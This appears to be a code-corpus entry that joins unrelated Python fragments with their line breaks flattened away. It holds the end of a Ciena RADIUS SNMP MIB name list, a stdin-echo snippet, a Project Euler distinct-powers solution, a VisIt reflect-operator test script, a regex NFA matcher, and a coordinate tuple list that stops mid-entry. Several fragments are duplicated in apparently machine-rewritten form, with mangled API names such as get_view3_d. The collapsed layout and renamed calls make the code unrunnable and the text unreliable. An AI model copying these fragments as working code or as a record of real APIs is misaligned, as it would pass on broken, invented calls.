cienaCesRadiusDot1xAuth=cienaCesRadiusDot1xAuth, cienaCesRadiusUserLoginAddr=cienaCesRadiusUserLoginAddr, cienaCesRadiusUserLoginAcctIndex=cienaCesRadiusUserLoginAcctIndex, cienaCesRadiusDot1xAuthRetries=cienaCesRadiusDot1xAuthRetries, cienaCesRadiusDot1xAcctAccessRejects=cienaCesRadiusDot1xAcctAccessRejects, cienaCesRadiusUserLoginPacketsDropped=cienaCesRadiusUserLoginPacketsDropped, cienaCesRadiusDot1xAuthPriority=cienaCesRadiusDot1xAuthPriority, cienaCesRadiusDot1xAcctAccessAccepts=cienaCesRadiusDot1xAcctAccessAccepts, cienaCesRadiusUserLoginAccessAccepts=cienaCesRadiusUserLoginAccessAccepts, cienaCesRadiusUserLoginAcctRoundTripTime=cienaCesRadiusUserLoginAcctRoundTripTime, cienaCesRadiusClientServerTimeouts=cienaCesRadiusClientServerTimeouts, cienaCesRadiusDot1xAcctGlobal=cienaCesRadiusDot1xAcctGlobal, cienaCesRadiusClientMIBNotificationPrefix=cienaCesRadiusClientMIBNotificationPrefix, cienaCesRadiusUserLoginAcctResolvedInetAddress=cienaCesRadiusUserLoginAcctResolvedInetAddress, cienaCesRadiusDot1xAuthTimeouts=cienaCesRadiusDot1xAuthTimeouts, cienaCesRadiusUserLoginAcctBadAuthenticators=cienaCesRadiusUserLoginAcctBadAuthenticators, cienaCesRadiusUserLoginAcctStatus=cienaCesRadiusUserLoginAcctStatus, cienaCesRadiusClientServerRoundTripTime=cienaCesRadiusClientServerRoundTripTime, cienaCesRadiusUserLoginAuthSecret=cienaCesRadiusUserLoginAuthSecret, cienaCesRadiusDot1xAuthRetransmissions=cienaCesRadiusDot1xAuthRetransmissions, cienaCesRadiusUserLoginAcctRequests=cienaCesRadiusUserLoginAcctRequests, cienaCesRadiusDot1xAcctRequests=cienaCesRadiusDot1xAcctRequests, cienaCesRadiusDot1xAuthAddr=cienaCesRadiusDot1xAuthAddr, cienaCesRadiusClientServerPacketsDropped=cienaCesRadiusClientServerPacketsDropped, cienaCesRadiusDot1xAuthResolvedInetAddress=cienaCesRadiusDot1xAuthResolvedInetAddress, cienaCesRadiusDot1xAuthAccessChallenges=cienaCesRadiusDot1xAuthAccessChallenges, cienaCesRadiusUserLoginPriority=cienaCesRadiusUserLoginPriority, cienaCesRadiusDot1xAcctUnknownTypes=cienaCesRadiusDot1xAcctUnknownTypes)
with open('/dev/stdin/') as f: f.readline() for l in f: print(l, end='')
with open('/dev/stdin/') as f: f.readline() for l in f: print(l, end='')
# coding: utf8 # Author: Wing Yung Chan (~wy) # Date: 2017 # Distinct Powers # Find the size of the set S # For all a^b fo 2<=a<=100 and 2<=b<=100 # S = {s = a^b | a,b in 2..100} def problem29(): powers = set() for a in range(2,101): for b in range(2,101): powers.add(pow(a,b)) return len(powers)
def problem29(): powers = set() for a in range(2, 101): for b in range(2, 101): powers.add(pow(a, b)) return len(powers)
# ---------------------------------------------------------------------------- # CLASSES: nightly # # Test Case: reflect.py # # Tests: mesh - 3D curvilinear, single domain, # 3D rectilinear, single domain. # 3D unstructured, single domain. # plots - pc, vector, subset # # Defect ID: '5079, '5872, '6321 # # Programmer: Hank Childs # Date: June 24, 2004 # # Modifications: # # Hank Childs, Fri Aug 13 09:52:28 PDT 2004 # Test ghost nodes along the reflection plane. # # Hank Childs, Thu Aug 19 16:37:35 PDT 2004 # Do not test ops_refl12 since that is done in reflect2.py (and will be # until SR mode plays well with transparency). # # Jeremy Meredith, Thu Oct 21 11:56:05 PDT 2004 # Reintegrated ops_refl12 since SR/transparency works now. # # Hank Childs, Thu Jan 20 11:31:43 PST 2005 # Test projecting then reflecting ['5872]. # # Hank Childs, Tue Jul 5 09:29:40 PDT 2005 # Test that reflected plots are not degenerate by using the volume plot # ['6321]. # # Jeremy Meredith, Tue Jul 15 10:43:58 EDT 2008 # Changed number of vectors in vector plot to match the old behavior. # (We now account for how many domains there are.) # # Mark C. Miller, Wed Jan 20 07:37:11 PST 2010 # Added ability to swtich between Silo's HDF5 and PDB data. # # Cyrus Harrison, Thu Mar 25 09:57:34 PDT 2010 # Added call(s) to DrawPlots() b/c of changes to the default plot state # behavior when an operator is added. # # Kathleen Biagas, Mon Dec 19 15:45:38 PST 2016 # Use FilledBoundary plot for materials instead of Subset. # # Alister Maguire, Wed Apr 25 15:56:47 PDT 2018 # Added tests for reflecting across an arbitrary plane. # # ---------------------------------------------------------------------------- # 3D, rectilinear. Multi-block Tests ghost zones as well. OpenDatabase(silo_data_path("rect2d.silo")) atts = ReflectAttributes() AddPlot("Pseudocolor", "d") AddOperator("Reflect") atts.reflections = (1, 0, 1, 0, 0, 0, 0, 0) SetOperatorOptions(atts) DrawPlots() Test("ops_refl01") DeleteAllPlots() AddPlot("Mesh", "quadmesh2d") AddPlot("FilledBoundary", "mat1") SetActivePlots((0,1)) AddOperator("Reflect") DrawPlots() atts.reflections = (0, 1, 1, 1, 0, 0, 0, 0) atts.useXBoundary = 0 atts.specifiedX = -0.1 atts.useYBoundary = 0 atts.specifiedY = -0.05 SetOperatorOptions(atts) Test("ops_refl02") DeleteAllPlots() OpenDatabase(silo_data_path("curv2d.silo")) AddPlot("Pseudocolor", "d") AddOperator("Reflect") DrawPlots() Test("ops_refl03") AddOperator("Isosurface") DrawPlots() Test("ops_refl04") # Move the isosurface operator before the reflect. This tests whether # or not we can reflect polydata. PromoteOperator(0) DrawPlots() Test("ops_refl05") DeleteAllPlots() # Test unstructured mesh -- plus test vectors. OpenDatabase(silo_data_path("globe.silo")) AddPlot("Vector", "vel") v = VectorAttributes() v.vectorOrigin = v.Head v.nVectors = 400*4 SetPlotOptions(v) AddOperator("Reflect") atts.reflections = (1, 0, 1, 0, 1, 0, 0, 1) atts.useXBoundary = 1 atts.useYBoundary = 1 SetOperatorOptions(atts) DrawPlots() v = GetView3D() v.viewNormal = (-0.324974, 0.839345, 0.435765) v.focus = (-10, -10, -10) v.viewUp = (-0.252067, 0.367233, -0.895322) v.viewAngle = 30 v.parallelScale = 34.641 v.nearPlane = -69.282 v.farPlane = 69.282 v.imagePan = (0, 0) v.imageZoom = 1.56244 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) SetView3D(v) Test("ops_refl06") # Now test a zonal vector variable (different code in the reflect operator). ChangeActivePlotsVar("disp") Test("ops_refl07") disp_atts = DisplaceAttributes() disp_atts.variable = "vel" SetDefaultOperatorOptions(disp_atts) AddOperator("Displace") DrawPlots() Test("ops_refl08") PromoteOperator(0) disp_atts.variable = "disp" disp_atts.factor = 4 SetOperatorOptions(disp_atts) ChangeActivePlotsVar("vel") DrawPlots() Test("ops_refl09") DeleteAllPlots() # Test that we properly put ghost nodes along the reflection plane. # There is a lot of code dedicated to creating the ghost nodes for a # rectilinear grid. Use the PXPYPZ and NXNYNZ octants to flex all of that # code. OpenDatabase(silo_data_path("noise.silo")) AddPlot("Pseudocolor", "hardyglobal") pc = PseudocolorAttributes() pc.SetOpacityType(pc.Constant) pc.opacity = 0.3 SetPlotOptions(pc) AddOperator("Reflect") r = ReflectAttributes() r.reflections = (1,1,1,1,1,1,1,1) SetOperatorOptions(r) DrawPlots() v = GetView3D() v.viewNormal = (-0.390471, 0.546441, 0.740901) v.focus = (-10, -10, -10) v.viewUp = (0.00925777, 0.807079, -0.590371) v.viewAngle = 30 v.parallelScale = 34.641 v.nearPlane = -69.282 v.farPlane = 69.282 v.imagePan = (0, 0) v.imageZoom = 1 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) SetView3D(v) Test("ops_refl10") r.octant = r.NXNYNZ SetOperatorOptions(r) v.viewNormal = (0.576101, 0.343493, 0.741701) v.focus = (10, 10, 10) v.viewUp = (-0.15522, 0.936877, -0.313318) SetView3D(v) Test("ops_refl11") # Now make sure that this works well with an everyday vtkPointSet as well. # Also test that we can handle the presence of both ghost nodes (from the # reflect) and ghost zones (from the multi_ucd3d file). DeleteAllPlots() OpenDatabase(silo_data_path("multi_ucd3d.silo")) AddPlot("Pseudocolor", "d") SetPlotOptions(pc) AddOperator("Reflect") r = ReflectAttributes() r.reflections = (1,0,0,0,1,0,0,0) SetOperatorOptions(r) DrawPlots() v.viewNormal = (0.328912, 0.896692, 0.296244) v.focus = (0, 2.5, 20) v.viewUp = (-0.710536, 0.441617, -0.547826) v.viewAngle = 30 v.parallelScale = 20.7666 v.nearPlane = -41.5331 v.farPlane = 41.5331 v.imagePan = (-0.237006, -0.229008) v.imageZoom = 1.25605 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) SetView3D(v) Test("ops_refl12") DeleteAllPlots() OpenDatabase(silo_data_path("globe.silo")) AddPlot("Boundary", "mat1") AddOperator("Project") AddOperator("Reflect") DrawPlots() Test("ops_refl13") # The "mass volume extractor" of the volume renderer depends on the # rectilinear grid not being inverted. Test that here ('6321). DeleteAllPlots() OpenDatabase(silo_data_path("rect3d.silo")) AddPlot("Volume", "d") AddOperator("Reflect") DrawPlots() Test("ops_refl14") # # Now test reflecting different datasets over arbitrary planes. # # Test 3D rectilinear over arbitrary plane. DeleteAllPlots() OpenDatabase(silo_data_path("multi_rect3d.silo")) AddPlot("Pseudocolor" ,"d") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (1, 1, 1) atts.planeNormal = (4, 5, 6) SetOperatorOptions(atts) DrawPlots() Test("arb_plane00") # Test 3D curvilinear over arbitrary plane. DeleteAllPlots() ResetView() OpenDatabase(silo_data_path("curv3d.silo")) AddPlot("Pseudocolor" ,"v") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, -4) atts.planeNormal = (4.5, 3, 2) SetOperatorOptions(atts) DrawPlots() Test("arb_plane01") # Test 2D curvilinear DeleteAllPlots() OpenDatabase(silo_data_path("curv2d.silo")) AddPlot("Pseudocolor" ,"v") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, 0) atts.planeNormal = (4.5, 3, 0) SetOperatorOptions(atts) DrawPlots() Test("arb_plane02") # Test 3D unstructured DeleteAllPlots() OpenDatabase(silo_data_path("globe.silo")) AddPlot("Pseudocolor" ,"v") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, 0) atts.planeNormal = (7, 9, 1) SetOperatorOptions(atts) DrawPlots() Test("arb_plane03") AddOperator("Reflect") atts = ReflectAttributes() atts.reflectType = atts.Plane atts.planePoint = (20, 15, 19) atts.planeNormal = (3, 2, 4) SetOperatorOptions(atts) DrawPlots() Test("arb_plane04") Exit()
open_database(silo_data_path('rect2d.silo')) atts = reflect_attributes() add_plot('Pseudocolor', 'd') add_operator('Reflect') atts.reflections = (1, 0, 1, 0, 0, 0, 0, 0) set_operator_options(atts) draw_plots() test('ops_refl01') delete_all_plots() add_plot('Mesh', 'quadmesh2d') add_plot('FilledBoundary', 'mat1') set_active_plots((0, 1)) add_operator('Reflect') draw_plots() atts.reflections = (0, 1, 1, 1, 0, 0, 0, 0) atts.useXBoundary = 0 atts.specifiedX = -0.1 atts.useYBoundary = 0 atts.specifiedY = -0.05 set_operator_options(atts) test('ops_refl02') delete_all_plots() open_database(silo_data_path('curv2d.silo')) add_plot('Pseudocolor', 'd') add_operator('Reflect') draw_plots() test('ops_refl03') add_operator('Isosurface') draw_plots() test('ops_refl04') promote_operator(0) draw_plots() test('ops_refl05') delete_all_plots() open_database(silo_data_path('globe.silo')) add_plot('Vector', 'vel') v = vector_attributes() v.vectorOrigin = v.Head v.nVectors = 400 * 4 set_plot_options(v) add_operator('Reflect') atts.reflections = (1, 0, 1, 0, 1, 0, 0, 1) atts.useXBoundary = 1 atts.useYBoundary = 1 set_operator_options(atts) draw_plots() v = get_view3_d() v.viewNormal = (-0.324974, 0.839345, 0.435765) v.focus = (-10, -10, -10) v.viewUp = (-0.252067, 0.367233, -0.895322) v.viewAngle = 30 v.parallelScale = 34.641 v.nearPlane = -69.282 v.farPlane = 69.282 v.imagePan = (0, 0) v.imageZoom = 1.56244 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) set_view3_d(v) test('ops_refl06') change_active_plots_var('disp') test('ops_refl07') disp_atts = displace_attributes() disp_atts.variable = 'vel' set_default_operator_options(disp_atts) add_operator('Displace') draw_plots() test('ops_refl08') promote_operator(0) disp_atts.variable = 'disp' disp_atts.factor = 4 set_operator_options(disp_atts) change_active_plots_var('vel') draw_plots() test('ops_refl09') delete_all_plots() open_database(silo_data_path('noise.silo')) add_plot('Pseudocolor', 'hardyglobal') pc = pseudocolor_attributes() pc.SetOpacityType(pc.Constant) pc.opacity = 0.3 set_plot_options(pc) add_operator('Reflect') r = reflect_attributes() r.reflections = (1, 1, 1, 1, 1, 1, 1, 1) set_operator_options(r) draw_plots() v = get_view3_d() v.viewNormal = (-0.390471, 0.546441, 0.740901) v.focus = (-10, -10, -10) v.viewUp = (0.00925777, 0.807079, -0.590371) v.viewAngle = 30 v.parallelScale = 34.641 v.nearPlane = -69.282 v.farPlane = 69.282 v.imagePan = (0, 0) v.imageZoom = 1 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) set_view3_d(v) test('ops_refl10') r.octant = r.NXNYNZ set_operator_options(r) v.viewNormal = (0.576101, 0.343493, 0.741701) v.focus = (10, 10, 10) v.viewUp = (-0.15522, 0.936877, -0.313318) set_view3_d(v) test('ops_refl11') delete_all_plots() open_database(silo_data_path('multi_ucd3d.silo')) add_plot('Pseudocolor', 'd') set_plot_options(pc) add_operator('Reflect') r = reflect_attributes() r.reflections = (1, 0, 0, 0, 1, 0, 0, 0) set_operator_options(r) draw_plots() v.viewNormal = (0.328912, 0.896692, 0.296244) v.focus = (0, 2.5, 20) v.viewUp = (-0.710536, 0.441617, -0.547826) v.viewAngle = 30 v.parallelScale = 20.7666 v.nearPlane = -41.5331 v.farPlane = 41.5331 v.imagePan = (-0.237006, -0.229008) v.imageZoom = 1.25605 v.perspective = 1 v.eyeAngle = 2 v.centerOfRotationSet = 0 v.centerOfRotation = (0, 0, 0) set_view3_d(v) test('ops_refl12') delete_all_plots() open_database(silo_data_path('globe.silo')) add_plot('Boundary', 'mat1') add_operator('Project') add_operator('Reflect') draw_plots() test('ops_refl13') delete_all_plots() open_database(silo_data_path('rect3d.silo')) add_plot('Volume', 'd') add_operator('Reflect') draw_plots() test('ops_refl14') delete_all_plots() open_database(silo_data_path('multi_rect3d.silo')) add_plot('Pseudocolor', 'd') add_operator('Reflect') atts = reflect_attributes() atts.reflectType = atts.Plane atts.planePoint = (1, 1, 1) atts.planeNormal = (4, 5, 6) set_operator_options(atts) draw_plots() test('arb_plane00') delete_all_plots() reset_view() open_database(silo_data_path('curv3d.silo')) add_plot('Pseudocolor', 'v') add_operator('Reflect') atts = reflect_attributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, -4) atts.planeNormal = (4.5, 3, 2) set_operator_options(atts) draw_plots() test('arb_plane01') delete_all_plots() open_database(silo_data_path('curv2d.silo')) add_plot('Pseudocolor', 'v') add_operator('Reflect') atts = reflect_attributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, 0) atts.planeNormal = (4.5, 3, 0) set_operator_options(atts) draw_plots() test('arb_plane02') delete_all_plots() open_database(silo_data_path('globe.silo')) add_plot('Pseudocolor', 'v') add_operator('Reflect') atts = reflect_attributes() atts.reflectType = atts.Plane atts.planePoint = (-8, -3, 0) atts.planeNormal = (7, 9, 1) set_operator_options(atts) draw_plots() test('arb_plane03') add_operator('Reflect') atts = reflect_attributes() atts.reflectType = atts.Plane atts.planePoint = (20, 15, 19) atts.planeNormal = (3, 2, 4) set_operator_options(atts) draw_plots() test('arb_plane04') exit()
# Let's refactor star.py into an almost-Thompson algorithm. The idea: # represent a regex with tree nodes augmented with a 'chain' link that # can be cyclic. The nodes plus the chains form the Thompson NFA # graph, but a node can be labeled with 'star' (as well as Thompson's # 'literal' and 'either' nodes), and we derive the action code from # star.py's nullable() and after(). A sub-regex is represented by a # *pair* of a regex node and the node to follow it: this represents # the regex *between* the start and the follow. So you can ask # after(ch, start, follow) as the equivalent of after(ch, re) in # star.py, etc. # The point: stepping without allocating new regexes and yet without # Thompson's infinite looping. Thompson's code is even simpler, but # less correct for our purposes: # * It gets caught in an infinite loop for expressions like /A**/. # * It keeps a list of states instead of a set; the list may blow up # exponentially. # * There's no accepts() function; instead it reports when it runs # into the accept node in after(). So matches get reported upon # scanning the next character *after* the match. # I think I've done a lousy job explaining how we got here; it'll have # to do for now. def search(re, chars): return run(re(accept), chars) def run(start, chars): if accepts(start): return True states = set([start]) for ch in chars: states = set(sum((after(ch, state, accept) for state in states), [])) if any(map(accepts, states)): return True return False def accepts(start): if start == accept: return True tag, r, s = nodes[start] if tag == 'literal': return False elif tag == 'either': return accepts(r) or accepts(s) elif tag == 'star': return accepts(s) else: assert False def after(ch, start, end): if start == end: return [] tag, r, s = nodes[start] if tag == 'literal': return [s] if r == ch else [] elif tag == 'either': return after(ch, r, end) + after(ch, s, end) elif tag == 'star': return after(ch, r, start) + after(ch, s, end) else: assert False # Since the compiled graph has loops in it, we can't represent it as # a tree of tuples anymore. Instead a node is an index into the nodes # array, each element of which is a tuple like we had before. accept = -1 # A sentinel node that's never accessed. nodes = [] def add(tag, r, s): nodes.append((tag, r, s)) return len(nodes) - 1 def literal(ch): return lambda k: add('literal', ch, k) def chain(r, s): return lambda k: r(s(k)) def either(r, s): return lambda k: add('either', r(k), s(k)) def star(r): def rstar(k): node = add('star', None, k) nodes[node] = ('star', r(node), k) return node return rstar
def search(re, chars): return run(re(accept), chars) def run(start, chars): if accepts(start): return True states = set([start]) for ch in chars: states = set(sum((after(ch, state, accept) for state in states), [])) if any(map(accepts, states)): return True return False def accepts(start): if start == accept: return True (tag, r, s) = nodes[start] if tag == 'literal': return False elif tag == 'either': return accepts(r) or accepts(s) elif tag == 'star': return accepts(s) else: assert False def after(ch, start, end): if start == end: return [] (tag, r, s) = nodes[start] if tag == 'literal': return [s] if r == ch else [] elif tag == 'either': return after(ch, r, end) + after(ch, s, end) elif tag == 'star': return after(ch, r, start) + after(ch, s, end) else: assert False accept = -1 nodes = [] def add(tag, r, s): nodes.append((tag, r, s)) return len(nodes) - 1 def literal(ch): return lambda k: add('literal', ch, k) def chain(r, s): return lambda k: r(s(k)) def either(r, s): return lambda k: add('either', r(k), s(k)) def star(r): def rstar(k): node = add('star', None, k) nodes[node] = ('star', r(node), k) return node return rstar
coordinates_E0E1E1 = ((126, 75), (127, 71), (127, 72), (127, 73), (127, 74), (127, 76), (128, 67), (128, 69), (128, 70), (128, 77), (128, 86), (128, 103), (128, 104), (129, 67), (129, 71), (129, 72), (129, 73), (129, 74), (129, 75), (129, 77), (129, 86), (130, 67), (130, 69), (130, 70), (130, 71), (130, 72), (130, 73), (130, 74), (130, 75), (130, 77), (130, 86), (130, 87), (130, 103), (130, 105), (130, 112), (131, 67), (131, 69), (131, 70), (131, 71), (131, 72), (131, 73), (131, 74), (131, 75), (131, 76), (131, 78), (131, 86), (131, 87), (131, 102), (131, 104), (131, 106), (131, 110), (131, 115), (132, 67), (132, 69), (132, 70), (132, 74), (132, 75), (132, 76), (132, 78), (132, 87), (132, 88), (132, 97), (132, 102), (132, 104), (132, 105), (132, 107), (132, 108), (132, 112), (132, 113), (132, 116), (132, 122), (132, 124), (133, 71), (133, 72), (133, 73), (133, 75), (133, 76), (133, 78), (133, 87), (133, 89), (133, 98), (133, 101), (133, 102), (133, 103), (133, 104), (133, 105), (133, 106), (133, 110), (133, 111), (133, 112), (133, 113), (133, 114), (133, 115), (133, 118), (133, 119), (133, 120), (133, 121), (133, 124), (134, 67), (134, 70), (134, 74), (134, 76), (134, 77), (134, 79), (134, 88), (134, 98), (134, 102), (134, 103), (134, 104), (134, 105), (134, 106), (134, 107), (134, 108), (134, 109), (134, 110), (134, 111), (134, 112), (134, 113), (134, 114), (134, 115), (134, 116), (134, 122), (134, 124), (135, 75), (135, 77), (135, 78), (135, 80), (135, 89), (135, 90), (135, 97), (135, 101), (135, 102), (135, 103), (135, 104), (135, 105), (135, 106), (135, 107), (135, 108), (135, 109), (135, 110), (135, 111), (135, 112), (135, 113), (135, 114), (135, 115), (135, 116), (135, 117), (135, 118), (135, 119), (135, 120), (135, 121), (135, 122), (135, 124), (136, 76), (136, 78), (136, 79), (136, 81), (136, 89), (136, 97), (136, 99), (136, 100), (136, 101), (136, 102), (136, 103), (136, 104), (136, 105), (136, 106), (136, 107), (136, 108), (136, 109), (136, 110), (136, 111), (136, 112), (136, 113), (136, 114), (136, 115), (136, 116), (136, 117), (136, 118), (136, 119), (136, 120), (136, 121), (136, 123), (137, 77), (137, 79), (137, 80), (137, 83), (137, 89), (137, 90), (137, 93), (137, 94), (137, 95), (137, 97), (137, 98), (137, 99), (137, 100), (137, 101), (137, 102), (137, 103), (137, 104), (137, 105), (137, 106), (137, 107), (137, 108), (137, 109), (137, 110), (137, 111), (137, 112), (137, 113), (137, 114), (137, 115), (137, 116), (137, 117), (137, 118), (137, 119), (137, 120), (137, 121), (137, 123), (138, 77), (138, 79), (138, 80), (138, 81), (138, 84), (138, 85), (138, 88), (138, 89), (138, 90), (138, 91), (138, 97), (138, 98), (138, 99), (138, 100), (138, 101), (138, 102), (138, 103), (138, 104), (138, 105), (138, 106), (138, 107), (138, 108), (138, 109), (138, 110), (138, 111), (138, 112), (138, 113), (138, 114), (138, 115), (138, 116), (138, 117), (138, 118), (138, 119), (138, 120), (138, 121), (138, 123), (139, 76), (139, 78), (139, 79), (139, 80), (139, 81), (139, 82), (139, 83), (139, 86), (139, 89), (139, 90), (139, 91), (139, 92), (139, 93), (139, 94), (139, 95), (139, 96), (139, 97), (139, 98), (139, 99), (139, 100), (139, 101), (139, 102), (139, 103), (139, 104), (139, 105), (139, 106), (139, 107), (139, 108), (139, 109), (139, 110), (139, 111), (139, 112), (139, 113), (139, 114), (139, 115), (139, 116), (139, 117), (139, 118), (139, 119), (139, 120), (139, 121), (139, 122), (139, 124), (139, 134), (140, 75), (140, 77), (140, 78), (140, 79), (140, 80), (140, 81), (140, 82), (140, 83), (140, 84), (140, 85), (140, 88), (140, 89), (140, 90), (140, 91), (140, 92), (140, 93), (140, 94), (140, 95), (140, 96), (140, 97), (140, 98), (140, 99), (140, 100), (140, 101), (140, 102), (140, 103), (140, 104), (140, 105), (140, 106), (140, 107), (140, 108), (140, 109), (140, 110), (140, 111), (140, 112), (140, 113), (140, 114), (140, 115), (140, 116), (140, 117), (140, 118), (140, 119), (140, 120), (140, 121), (140, 122), (140, 123), (140, 125), (140, 134), (140, 135), (141, 73), (141, 76), (141, 77), (141, 78), (141, 79), (141, 80), (141, 81), (141, 82), (141, 83), (141, 84), (141, 85), (141, 86), (141, 87), (141, 88), (141, 89), (141, 90), (141, 91), (141, 92), (141, 93), (141, 94), (141, 95), (141, 96), (141, 97), (141, 98), (141, 99), (141, 100), (141, 101), (141, 102), (141, 103), (141, 104), (141, 105), (141, 106), (141, 107), (141, 108), (141, 109), (141, 110), (141, 111), (141, 112), (141, 113), (141, 114), (141, 115), (141, 116), (141, 117), (141, 118), (141, 119), (141, 120), (141, 121), (141, 122), (141, 123), (141, 125), (141, 134), (142, 71), (142, 75), (142, 76), (142, 77), (142, 78), (142, 79), (142, 80), (142, 81), (142, 82), (142, 83), (142, 84), (142, 85), (142, 86), (142, 87), (142, 88), (142, 89), (142, 90), (142, 91), (142, 92), (142, 94), (142, 95), (142, 96), (142, 97), (142, 98), (142, 99), (142, 100), (142, 101), (142, 102), (142, 103), (142, 104), (142, 105), (142, 106), (142, 107), (142, 108), (142, 109), (142, 110), (142, 111), (142, 112), (142, 113), (142, 114), (142, 115), (142, 116), (142, 117), (142, 118), (142, 119), (142, 120), (142, 121), (142, 122), (142, 123), (142, 125), (142, 134), (143, 69), (143, 73), (143, 74), (143, 75), (143, 76), (143, 77), (143, 78), (143, 79), (143, 80), (143, 81), (143, 82), (143, 83), (143, 84), (143, 85), (143, 86), (143, 87), (143, 88), (143, 89), (143, 90), (143, 93), (143, 96), (143, 97), (143, 98), (143, 99), (143, 100), (143, 101), (143, 102), (143, 103), (143, 104), (143, 105), (143, 106), (143, 107), (143, 108), (143, 109), (143, 110), (143, 111), (143, 112), (143, 113), (143, 114), (143, 115), (143, 116), (143, 117), (143, 118), (143, 119), (143, 120), (143, 121), (143, 122), (143, 123), (143, 125), (143, 133), (144, 68), (144, 71), (144, 72), (144, 73), (144, 74), (144, 75), (144, 76), (144, 77), (144, 78), (144, 79), (144, 80), (144, 81), (144, 82), (144, 83), (144, 84), (144, 85), (144, 86), (144, 87), (144, 88), (144, 91), (144, 92), (144, 94), (144, 96), (144, 97), (144, 98), (144, 99), (144, 100), (144, 101), (144, 102), (144, 103), (144, 104), (144, 105), (144, 106), (144, 107), (144, 108), (144, 109), (144, 110), (144, 111), (144, 112), (144, 113), (144, 114), (144, 115), (144, 116), (144, 117), (144, 118), (144, 119), (144, 120), (144, 121), (144, 122), (144, 123), (144, 124), (144, 126), (145, 68), (145, 70), (145, 71), (145, 72), (145, 73), (145, 74), (145, 75), (145, 76), (145, 77), (145, 78), (145, 79), (145, 80), (145, 81), (145, 82), (145, 83), (145, 84), (145, 85), (145, 89), (145, 90), (145, 96), (145, 98), (145, 99), (145, 100), (145, 101), (145, 102), (145, 103), (145, 104), (145, 105), (145, 106), (145, 107), (145, 108), (145, 109), (145, 110), (145, 111), (145, 112), (145, 113), (145, 114), (145, 115), (145, 116), (145, 117), (145, 118), (145, 119), (145, 120), (145, 121), (145, 122), (145, 123), (145, 124), (145, 125), (145, 127), (145, 132), (146, 68), (146, 70), (146, 71), (146, 72), (146, 73), (146, 74), (146, 75), (146, 76), (146, 77), (146, 78), (146, 79), (146, 80), (146, 81), (146, 82), (146, 86), (146, 87), (146, 96), (146, 98), (146, 99), (146, 100), (146, 101), (146, 102), (146, 103), (146, 104), (146, 105), (146, 106), (146, 107), (146, 108), (146, 109), (146, 110), (146, 111), (146, 112), (146, 113), (146, 114), (146, 115), (146, 116), (146, 117), (146, 118), (146, 119), (146, 120), (146, 121), (146, 122), (146, 123), (146, 124), (146, 125), (146, 126), (146, 128), (146, 129), (146, 131), (147, 71), (147, 72), (147, 73), (147, 74), (147, 75), (147, 76), (147, 83), (147, 85), (147, 97), (147, 99), (147, 100), (147, 101), (147, 102), (147, 103), (147, 104), (147, 105), (147, 106), (147, 107), (147, 108), (147, 109), (147, 110), (147, 111), (147, 112), (147, 113), (147, 114), (147, 115), (147, 116), (147, 117), (147, 118), (147, 119), (147, 120), (147, 121), (147, 122), (147, 123), (147, 124), (147, 125), (147, 126), (147, 127), (147, 130), (148, 69), (148, 76), (148, 77), (148, 78), (148, 79), (148, 80), (148, 81), (148, 82), (148, 97), (148, 99), (148, 100), (148, 101), (148, 102), (148, 103), (148, 104), (148, 105), (148, 106), (148, 107), (148, 108), (148, 109), (148, 110), (148, 111), (148, 112), (148, 113), (148, 114), (148, 115), (148, 116), (148, 117), (148, 118), (148, 119), (148, 120), (148, 121), (148, 122), (148, 123), (148, 124), (148, 125), (148, 126), (148, 127), (148, 128), (148, 130), (149, 70), (149, 72), (149, 73), (149, 74), (149, 75), (149, 76), (149, 97), (149, 99), (149, 100), (149, 101), (149, 102), (149, 103), (149, 104), (149, 105), (149, 106), (149, 107), (149, 108), (149, 109), (149, 110), (149, 111), (149, 112), (149, 113), (149, 114), (149, 115), (149, 116), (149, 117), (149, 118), (149, 119), (149, 120), (149, 121), (149, 122), (149, 123), (149, 124), (149, 125), (149, 126), (149, 127), (149, 128), (149, 130), (149, 139), (150, 71), (150, 98), (150, 100), (150, 101), (150, 102), (150, 103), (150, 104), (150, 105), (150, 106), (150, 107), (150, 108), (150, 109), (150, 110), (150, 111), (150, 112), (150, 113), (150, 114), (150, 115), (150, 116), (150, 117), (150, 118), (150, 119), (150, 120), (150, 121), (150, 122), (150, 123), (150, 124), (150, 125), (150, 126), (150, 127), (150, 128), (150, 129), (150, 130), (150, 139), (150, 140), (151, 99), (151, 101), (151, 102), (151, 103), (151, 104), (151, 105), (151, 106), (151, 107), (151, 108), (151, 109), (151, 110), (151, 111), (151, 112), (151, 113), (151, 114), (151, 115), (151, 116), (151, 117), (151, 118), (151, 119), (151, 120), (151, 121), (151, 122), (151, 123), (151, 124), (151, 125), (151, 126), (151, 127), (151, 128), (151, 130), (151, 139), (151, 140), (152, 98), (152, 100), (152, 101), (152, 102), (152, 103), (152, 104), (152, 105), (152, 106), (152, 107), (152, 108), (152, 109), (152, 110), (152, 111), (152, 112), (152, 113), (152, 114), (152, 115), (152, 116), (152, 117), (152, 118), (152, 119), (152, 120), (152, 121), (152, 122), (152, 123), (152, 124), (152, 125), (152, 126), (152, 127), (152, 128), (152, 130), (152, 139), (152, 140), (153, 98), (153, 100), (153, 101), (153, 102), (153, 103), (153, 104), (153, 105), (153, 106), (153, 107), (153, 108), (153, 109), (153, 110), (153, 111), (153, 112), (153, 113), (153, 114), (153, 115), (153, 116), (153, 117), (153, 118), (153, 119), (153, 120), (153, 121), (153, 122), (153, 123), (153, 124), (153, 125), (153, 126), (153, 127), (153, 128), (153, 130), (153, 139), (153, 140), (154, 98), (154, 100), (154, 101), (154, 102), (154, 103), (154, 104), (154, 105), (154, 106), (154, 107), (154, 108), (154, 109), (154, 110), (154, 111), (154, 112), (154, 113), (154, 114), (154, 115), (154, 116), (154, 117), (154, 